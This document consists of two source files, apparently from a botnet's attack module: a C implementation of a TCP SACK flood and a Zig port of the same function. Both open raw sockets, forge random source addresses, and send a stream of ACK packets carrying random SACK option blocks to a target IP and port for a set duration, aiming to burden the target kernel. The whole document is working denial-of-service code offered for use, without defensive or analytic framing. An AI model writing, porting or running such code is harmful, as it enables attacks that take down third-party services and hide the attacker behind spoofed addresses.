File: crates/nodes/cloud/modules/attack/methods/sack.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <time.h>

#include "attack.h"

struct pseudo_header {
    u_int32_t source_address;
    u_int32_t dest_address;
    u_int8_t placeholder;
    u_int8_t protocol;
    u_int16_t tcp_length;
};

// Advanced SACK (Selective ACK) Flood
// Uses SACK Options to force target kernel to perform expensive queue scanning.
// Payload: SACK Option with random block ranges.
void attack_tcp_sack(uint32_t ip, uint16_t port, uint32_t duration) {
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (sock < 0) return;

    int one = 1;
    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one));

    struct sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = ip;

    char packet[4096];
    struct ip *iph = (struct ip *)packet;
    struct tcphdr *tcph = (struct tcphdr *)(packet + sizeof(struct ip));
    struct pseudo_header psh;

    time_t end_time = time(NULL) + duration;

    // SACK Option Structure:
    // Kind: 5 (SACK)
    // Length: Variable (e.g., 10, 18, 26, 34)
    // Edges: Left edge (4B), Right edge (4B) ... up to 4 blocks.
    // Total max option space 40 bytes. We can fit 4 blocks (32 bytes) + 2 bytes header = 34 bytes.
    
    // IP Header
    iph->ip_hl = 5;
    iph->ip_v = 4;
    iph->ip_tos = 0;
    iph->ip_len = sizeof(struct ip) + sizeof(struct tcphdr) + 36; // 36 bytes options
    iph->ip_id = htonl(54321);
    iph->ip_off = 0;
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    iph->ip_dst.s_addr = ip;

    while (time(NULL) < end_time) {
        iph->ip_src.s_addr = fast_rand();
        iph->ip_id = htonl(fast_rand() & 0xFFFF);
        iph->ip_sum = 0;
        iph->ip_sum = csum((unsigned short *)packet, iph->ip_len);

        tcph->th_sport = htons(fast_rand() & 0xFFFF);
        tcph->th_dport = htons(port);
        tcph->th_seq = fast_rand();
        tcph->th_ack = fast_rand(); // Must differ from seq usually
        tcph->th_off = 14; // 5 + 9 words (36 bytes)
        tcph->th_flags = TH_ACK; // SACK requires ACK
        tcph->th_win = htons(64240);
        tcph->th_sum = 0;
        tcph->th_urp = 0;

        uint8_t *opts = (uint8_t *)(packet + sizeof(struct ip) + sizeof(struct tcphdr));
        
        // NOP NOP to align?
        opts[0] = 1; opts[1] = 1; 

        // SACK Option (Kind 5)
        // Length 34 (2 header + 32 data for 4 blocks)
        opts[2] = 5; opts[3] = 34;

        // Generate 4 random SACK blocks
        // Block 1
        *(uint32_t*)(opts + 4) = htonl(fast_rand()); // Left
        *(uint32_t*)(opts + 8) = htonl(fast_rand()); // Right
        // Block 2
        *(uint32_t*)(opts + 12) = htonl(fast_rand());
        *(uint32_t*)(opts + 16) = htonl(fast_rand());
        // Block 3
        *(uint32_t*)(opts + 20) = htonl(fast_rand());
        *(uint32_t*)(opts + 24) = htonl(fast_rand());
        // Block 4
        *(uint32_t*)(opts + 28) = htonl(fast_rand());
        *(uint32_t*)(opts + 32) = htonl(fast_rand());

        psh.source_address = iph->ip_src.s_addr;
        psh.dest_address = sin.sin_addr.s_addr;
        psh.placeholder = 0;
        psh.protocol = IPPROTO_TCP;
        psh.tcp_length = htons(sizeof(struct tcphdr) + 36);

        // Calculate Checksum (Heavy op, but needed for pass-through)
        // Optimization: For SACK flood, speed matters more than correctness of checksum sometimes, 
        // but bad checksum is dropped by NIC usually. 
        // We use stack buffer optimization again.
        char pseudogram[256]; 
        memcpy(pseudogram, (char*)&psh, sizeof(struct pseudo_header));
        memcpy(pseudogram + sizeof(struct pseudo_header), tcph, sizeof(struct tcphdr) + 36);
        
        tcph->th_sum = csum((unsigned short*)pseudogram, sizeof(struct pseudo_header) + sizeof(struct tcphdr) + 36);

        sendto(sock, packet, iph->ip_len, 0, (struct sockaddr *)&sin, sizeof(sin));
    }
    close(sock);
}

File: crates/nodes/cloud/src/attack/sack.zig
//! # TCP SACK Panic Attack
//!
//! Sends TCP packets with SACK options to force expensive kernel queue scanning.
//!
//! ## C Reference: modules/attack/methods/sack.c (120 lines)

const std = @import("std");
const posix = std.posix;
const crypto = @import("../crypto/mod.zig");

const IPPROTO_TCP: u8 = 6;
const IPPROTO_RAW: u8 = 255;

// ============================================================
// IP HEADER
// ============================================================

const IpHeader = packed struct {
    version_ihl: u8,
    tos: u8,
    tot_len: u16,
    id: u16,
    frag_off: u16,
    ttl: u8,
    protocol: u8,
    check: u16,
    saddr: u32,
    daddr: u32,
};

// ============================================================
// TCP HEADER (with extended size for options)
// ============================================================

const TcpHeader = packed struct {
    source: u16,
    dest: u16,
    seq: u32,
    ack_seq: u32,
    doff_flags: u16, // Data offset = 14 words (56 bytes total TCP header)
    window: u16,
    check: u16,
    urg_ptr: u16,
};

// ============================================================
// SACK ATTACK (from C: sack.c attack_tcp_sack lines 25-119)
// ============================================================
// SACK Option:
// - Kind: 5 (SACK)
// - Length: 34 (2 header + 32 data for 4 blocks)
// - Each block: Left edge (4B) + Right edge (4B)

pub fn attackTcpSack(ip: u32, port: u16, duration: u32) void {
    // Create raw socket (from C: lines 26-30)
    const sock = posix.socket(posix.AF.INET, posix.SOCK.RAW, IPPROTO_RAW) catch return;
    defer posix.close(sock);

    const one: i32 = 1;
    const IP_HDRINCL = 3;
    posix.setsockopt(sock, posix.IPPROTO.IP, IP_HDRINCL, std.mem.asBytes(&one)) catch {};

    var rng = crypto.FastRandom.init(@truncate(@as(u64, @bitCast(std.time.timestamp()))));

    const end_time = std.time.timestamp() + duration;

    // Packet: IP(20) + TCP(20) + Options(36) = 76 bytes
    const PACKET_SIZE = 76;

    while (std.time.timestamp() < end_time) {
        var packet: [PACKET_SIZE]u8 = undefined;
        @memset(&packet, 0);

        // IP Header (from C: lines 51-59)
        const iph = @as(*IpHeader, @ptrCast(@alignCast(&packet)));
        iph.version_ihl = 0x45;
        iph.tos = 0;
        iph.tot_len = std.mem.nativeToBig(u16, PACKET_SIZE);
        iph.id = std.mem.nativeToBig(u16, @truncate(rng.next()));
        iph.frag_off = 0;
        iph.ttl = 255;
        iph.protocol = IPPROTO_TCP;
        iph.saddr = rng.next(); // Random spoofed source
        iph.daddr = ip;
        iph.check = 0;
        iph.check = crypto.internetChecksum(packet[0..20]);

        // TCP Header (from C: lines 67-75)
        const tcph = @as(*TcpHeader, @ptrCast(@alignCast(packet[20..].ptr)));
        tcph.source = std.mem.nativeToBig(u16, @truncate(rng.next()));
        tcph.dest = std.mem.nativeToBig(u16, port);
        tcph.seq = rng.next();
        tcph.ack_seq = rng.next();
        // Data offset = 14 words (56 bytes = 20 TCP + 36 options), ACK flag
        tcph.doff_flags = std.mem.nativeToBig(u16, 0xE010); // doff=14, ACK
        tcph.window = std.mem.nativeToBig(u16, 64240);
        tcph.check = 0;
        tcph.urg_ptr = 0;

        // TCP Options (from C: lines 77-98)
        const opts = packet[40..];

        // NOP NOP for alignment (from C: line 80)
        opts[0] = 1;
        opts[1] = 1;

        // SACK Option (Kind=5, Len=34) (from C: lines 83-84)
        opts[2] = 5; // SACK kind
        opts[3] = 34; // Length

        // Generate 4 random SACK blocks (from C: lines 87-98)
        // Block 1
        std.mem.writeInt(u32, opts[4..8], std.mem.nativeToBig(u32, rng.next()), .little);
        std.mem.writeInt(u32, opts[8..12], std.mem.nativeToBig(u32, rng.next()), .little);
        // Block 2
        std.mem.writeInt(u32, opts[12..16], std.mem.nativeToBig(u32, rng.next()), .little);
        std.mem.writeInt(u32, opts[16..20], std.mem.nativeToBig(u32, rng.next()), .little);
        // Block 3
        std.mem.writeInt(u32, opts[20..24], std.mem.nativeToBig(u32, rng.next()), .little);
        std.mem.writeInt(u32, opts[24..28], std.mem.nativeToBig(u32, rng.next()), .little);
        // Block 4
        std.mem.writeInt(u32, opts[28..32], std.mem.nativeToBig(u32, rng.next()), .little);
        std.mem.writeInt(u32, opts[32..36], std.mem.nativeToBig(u32, rng.next()), .little);

        // TCP checksum (from C: lines 100-114)
        tcph.check = calculateTcpChecksum(iph.saddr, ip, packet[20..PACKET_SIZE]);

        // Send (from C: line 116)
        var dest: posix.sockaddr.in = .{
            .family = posix.AF.INET,
            .port = std.mem.nativeToBig(u16, port),
            .addr = ip,
        };

        _ = posix.sendto(sock, &packet, 0, @ptrCast(&dest), @sizeOf(posix.sockaddr.in)) catch {};
    }
}

fn calculateTcpChecksum(saddr: u32, daddr: u32, tcp_segment: []const u8) u16 {
    var sum: u32 = 0;

    sum += (saddr >> 16) & 0xFFFF;
    sum += saddr & 0xFFFF;
    sum += (daddr >> 16) & 0xFFFF;
    sum += daddr & 0xFFFF;
    sum += IPPROTO_TCP;
    sum += @as(u16, @intCast(tcp_segment.len));

    var i: usize = 0;
    while (i + 1 < tcp_segment.len) : (i += 2) {
        sum += @as(u16, tcp_segment[i]) << 8 | tcp_segment[i + 1];
    }
    if (i < tcp_segment.len) {
        sum += @as(u16, tcp_segment[i]) << 8;
    }

    while (sum >> 16 != 0) {
        sum = (sum & 0xFFFF) + (sum >> 16);
    }

    return ~@as(u16, @truncate(sum));
}
